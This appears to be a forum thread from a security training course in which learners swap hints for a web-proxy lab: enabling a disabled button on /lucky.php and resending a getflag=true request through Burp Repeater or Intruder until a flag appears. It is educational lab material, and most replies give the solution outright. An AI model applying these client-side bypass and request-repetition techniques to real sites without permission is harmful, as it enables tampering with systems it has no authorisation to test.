Skills Assessment - Using Web Proxies First Question

Hello,
I’m doing the Web Proxies skills assessment and I’m stuck at the first question:
The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

I’ve tried to match and replace the response in Burp, replacing the ‘disabled’ by ‘enabled’. It seems to work when I click on the button now but it gives me a blank screen everytime.

The hint says the button doesn’t give the flag everytime but I don’t know what else I can do to be able to click it many times. Can anyone maybe give me a hint here?

Its been a while since I have done that question, but I am pretty sure you should keep trying the button.

I think I enabled the button, then captured the request and sent it to the repeater. Try out the repeater, it is easier to see the results.

Good luck,
-onthesauce

Do you enable the button via the request or the response?

Because when I change ‘disabled’ to ‘enabled’ with the replace rule in the response body, it seems to work but I keep getting the blank screen. Or, the closest i think I’ve come to it is a GET success.txt but the word ‘success’ is not the flag.

Steer away from the replace rule for this one. That might be over complicating it.

In the options, just check the box to have the proxy display responses. Modify it once there. Then press the button and do what I mentioned above.

DM me if you still have trouble.
-onthesauce

Got it. I had to try more times than I expected. I probably just wasn’t patient enough.

Nice, glad to hear it. Patience is definitely needed with some of these modules.

Using the embedded Burp Browser, I changed “disabled” to “enabled” in Developer Tools while capturing the traffic in Burp. Clicked on the button again in the Burp Browser. Then I sent the new request to Repeater. You should see “getflag=true” in the request. If not, you’re doing something wrong. Then I kept sending the request, maybe 5-10 times. Eventually the flag was included in the response. I think that’s part of the theme of:

John

First, using the Burp browser, you navigate to XXX/lucky.php and forward it.
Second, in the browser, you press F12 (DevTools) and switch from “disable” to “enable”.
Third, then you press the flag button.
Fourth, you capture it and send it to Repeater, it should show up in the Request as getflag=true.
Fifth, you forward it several times until the flag appears in the response

Keep an eye on content length size; it should tell you which response has the flag.
The question primarily tests whether or not you can apply the “Repeater” feature effectively.

1. intercepted the request
2. intercepted the response, removed disabled
3. send again the request, now a getflag=true shows up in the body
4. send to repeater
5. repeat a couple of times, nothing

couldn’t get what i was doing wrong. happens that i had to call the repeater 38 times before the flag showing. thought that was insane. tried again, appeared after 48 times. this is massive bs.

You need to enable the disabled form by using the Match and replace rules. Once the form is enabled, hit the button you should see a POST request to /lucky.php. Now you have two options:

1. Send to Reapeater and hit Send button patiently and
2. Use Instruder and let Burp does the job for you.

I used #2. I added an abitrary header and the value is a pointer which increases from 1 to 1000. You should notice the response size of the request - there is only one being bigger than the rest because that contains a flag.

Here is a link to zap fuzzer alternative if anyone needs one!

One more hint that worked for me…

If you don’t find a solution in the Burp repeater, use a bash script that sends 100 POST requests and finds that flag.

nice one.

I used Burp’s Intruder, changing the User-Agent value as appropriate. For example, I have 100 payload configurations with trailing zeros. Then when you press the Start attack button, some times the response will include the flag.